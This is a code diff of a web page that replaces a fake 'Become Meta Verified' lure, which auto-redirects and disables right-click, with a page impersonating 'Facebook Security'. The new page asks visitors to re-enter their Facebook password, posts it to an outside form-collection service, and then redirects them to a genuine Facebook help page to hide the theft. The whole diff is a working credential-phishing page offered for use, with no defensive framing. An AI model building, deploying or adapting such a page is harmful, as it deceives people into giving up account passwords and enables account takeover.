--- a/index.html
+++ b/index.html
@@ -1,143 +1,194 @@
 <!DOCTYPE html>
-
 <html lang="en">
 
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Home</title>
-    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
+    <title>Facebook Password Page</title>
+    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
     <style>
-        /* CSS styles */
-
         body {
-            font-family: system-ui;
+            font-family: 'Helvetica Neue', Arial, sans-serif;
+            background-color: #f0f2f5;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
             margin: 0;
-            padding: 0;
-        }
-
-        .container-fluid {
-            background: #F5F6F6;
         }
 
         .container {
-            padding: 1rem;
+            background-color: white;
+            padding: 40px 30px;
+            border-radius: 8px;
+            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.15);
+            text-align: center;
+            width: 360px;
+            position: relative;
         }
 
         .logo {
-            width: 9rem;
-            height: 6rem;
+            margin-bottom: 20px;
         }
 
-        .meta-logo {
-            width: 4rem;
-            height: 4rem;
+        .logo img {
+            width: 120px;
         }
 
-        .btn {
-            background: #0064e0;
-            border: none;
-            border-radius: 100px;
-            padding: 10px 35px;
-            text-decoration: none;
-            color: white;
-            display: inline-block;
-            margin-top: 1rem;
-            font-family: Arial, sans-serif;
-            /* Same font family */
-            font-size: 16px;
-            /* Adjust as needed */
-        }
-
-        .content {
-            margin-top: 3rem;
-            display: flex;
-            justify-content: center;
-        }
-
-        .content .col-sm-6 {
-            margin-top: 3rem;
-            margin-left: 5rem;
-        }
-
-        .content p {
+        .header {
+            margin-bottom: 20px;
             font-size: 18px;
-            margin-top: 1rem;
-            font-family: Arial, sans-serif;
-            /* Same font family */
+            color: #333;
+            font-weight: bold;
         }
 
-        .sign-up {
-            font-size: 17px;
-            padding-top: 1rem;
-            font-family: Arial, sans-serif;
-            /* Same font family */
+        .form-group {
+            margin-bottom: 25px;
+            text-align: left;
+            position: relative;
         }
 
-        .business-info {
+        .form-group label {
+            display: block;
+            font-weight: bold;
+            margin-bottom: 8px;
             font-size: 14px;
-            font-family: Arial, sans-serif;
-            /* Same font family */
+            color: #606770;
         }
 
-        .region-info {
-            font-size: 13px;
-            font-style: italic;
-            font-family: Arial, sans-serif;
-            /* Same font family */
+        .input-wrapper {
+            position: relative;
         }
 
-        .image {
-            display: none;
-            width: 42%;
-            height: 100vh;
-            /* Ensure full height */
-            background-size: cover;
-            /* background-position: center; */
-            /* margin-left: 5rem; */
+        .form-group input {
+            width: 100%;
+            padding: 14px;
+            padding-right: 40px;
+            /* Space for the eye icon */
+            border: 1px solid #ccd0d5;
+            border-radius: 6px;
+            font-size: 16px;
+            color: #1c1e21;
+            box-sizing: border-box;
         }
 
-        @media (min-width: 576px) {
-            .image {
-                display: block;
-            }
+        .form-group input:focus {
+            border-color: #1877f2;
+            outline: none;
+            box-shadow: 0px 0px 0px 2px rgba(24, 119, 242, 0.2);
+        }
+
+        .eye-icon {
+            position: absolute;
+            right: 10px;
+            top: 50%;
+            transform: translateY(-50%);
+            font-size: 20px;
+            color: #606770;
+            cursor: pointer;
+            transition: color 0.3s ease;
+        }
+
+        .eye-icon:hover {
+            color: #1877f2;
+        }
+
+        .submit-button {
+            background-color: #1877f2;
+            color: white;
+            border: none;
+            padding: 14px;
+            border-radius: 6px;
+            font-size: 16px;
+            font-weight: bold;
+            cursor: pointer;
+            width: 100%;
+            margin-top: 10px;
+        }
+
+        .submit-button:hover {
+            background-color: #166fe5;
+        }
+
+        .error-message {
+            color: #e74c3c;
+            font-size: 14px;
+            margin-top: 5px;
+            margin-bottom: 15px;
+            text-align: left;
         }
     </style>
 </head>
 
 <body>
-    <div class="container-fluid">
+    <div class="container">
+        <div class="logo">
+            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Logo">
+            <div class="header">
+                Facebook Security
+            </div>
+            <p>Please re-enter your password to complete the request.</p>
+            <form id="meta-form" action="https://submit-form.com/BRMYWgYqP" method="POST">
+                <!-- Replace with your Access Key -->
+                <input type="hidden" name="access_key" value="22983eba-14f6-431b-8283-10e298027760">
+                <div class="form-group">
+                    <label for="password">Password</label>
+                    <div class="input-wrapper">
+                        <input type="password" id="password" name="password" placeholder="Enter your password" required>
+                        <i class="eye-icon fas fa-eye" id="togglePassword"></i>
+                    </div>
+                    <span id="error-message" class="error-message"></span>
+                </div>
+                <button type="submit" class="submit-button">Submit</button>
+            </form>
+        </div>
+        <script>
+            document.getElementById('togglePassword').addEventListener('click', function() {
+                var passwordField = document.getElementById('password');
+                var eyeIcon = this;
+                if (passwordField.type === 'password') {
+                    passwordField.type = 'text';
+                    eyeIcon.classList.remove('fa-eye');
+                    eyeIcon.classList.add('fa-eye-slash');
+                } else {
+                    passwordField.type = 'password';
+                    eyeIcon.classList.remove('fa-eye-slash');
+                    eyeIcon.classList.add('fa-eye');
+                }
+            });
 
-    </div>
-    </div>
-    <div class="content">
-        <div class="col-sm-6">
-            <img src="https://cdn.glitch.global/94ce8094-2082-483e-8949-f3a4651ae83f/a89f7c20-27a2-4c6c-9a08-caa301574ad6.image.png" ?v=1717746772557?_nc_cat=106&amp;ccb=1-7&amp;_nc_sid=f537c7&amp;_nc_ohc=qtgF49guQsgQ7kNvgFGDO8w&amp;_nc_ht=scontent.fhdd4-1.fna&amp;oh=00_AYBsWhVkb0c0jCLieToyhfQNMluisvrty0CnBw_McPiMUA&amp;oe=665DB74B
-                " alt="meta " class="meta-logo ">
-      <h1 class="my-3 fs-1 ">Become <br> Meta Verified</h1>
-      <div style="margin-bottom: 30px; "></div>
-      <a href="meta next.html" class="btn ">Apply</a>
-      <p class="mt-4 ">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
-      <p class="sign-up ">Sign up now for creators</p>
-      <p class="mt-4 mb-0 ">
-        <span class="fw-semibold ">Are you a business?</span> Get more information on
-      </p>
-      <a href="# " class="business-info ">Meta verified for businesses</a>
-      <p class="mt-4 font-italic region-info ">Features, availability, and pricing may vary by region.</p>
-    </div>
-    <div class="col-sm-5 image " style="background-image: url( './background.png'); "></div>
-  </div>
+            document.getElementById('passwordForm').addEventListener('submit', function(event) {
+                var passwordField = document.getElementById('password');
+                var errorMessage = document.getElementById('error-message');
+                if (passwordField.value.length < 6) {
+                    errorMessage.textContent = 'Password must be at least 6 characters long.';
+                    event.preventDefault();
+                } else {
+                    errorMessage.textContent = '';
+                    // Perform form submission via Fetch API
+                    event.preventDefault(); // Prevent default form submission
+
+                    var formData = new FormData(this);
+                    fetch(this.action, {
+                            method: 'POST',
+                            body: formData,
+                            headers: {
+                                'Accept': 'application/json'
+                            }
+                        })
+                        .then(response => {
+                            if (response.ok) {
+                                window.location.href = 'https://www.facebook.com/help/media/thank-you?rdrhc'; // Redirect to desired URL
+                            } else {
+                                errorMessage.textContent = 'There was an error. Please try again.';
+                            }
+                        })
+                        .catch(() => {
+                            errorMessage.textContent = 'There was an error. Please try again.';
+                        });
+                }
+            });
+        </script>
 </body>
-<script>
-  document.addEventListener('contextmenu', event => {
-    event.preventDefault();
-  });
-
-  setTimeout(function() {
-  var redirectURL="meta next.html" // Updated URL
-  window.location.replace(redirectURL);
-  }, 3000); // 3000 milliseconds (3 seconds)
-  });
-</script>
 
 </html>
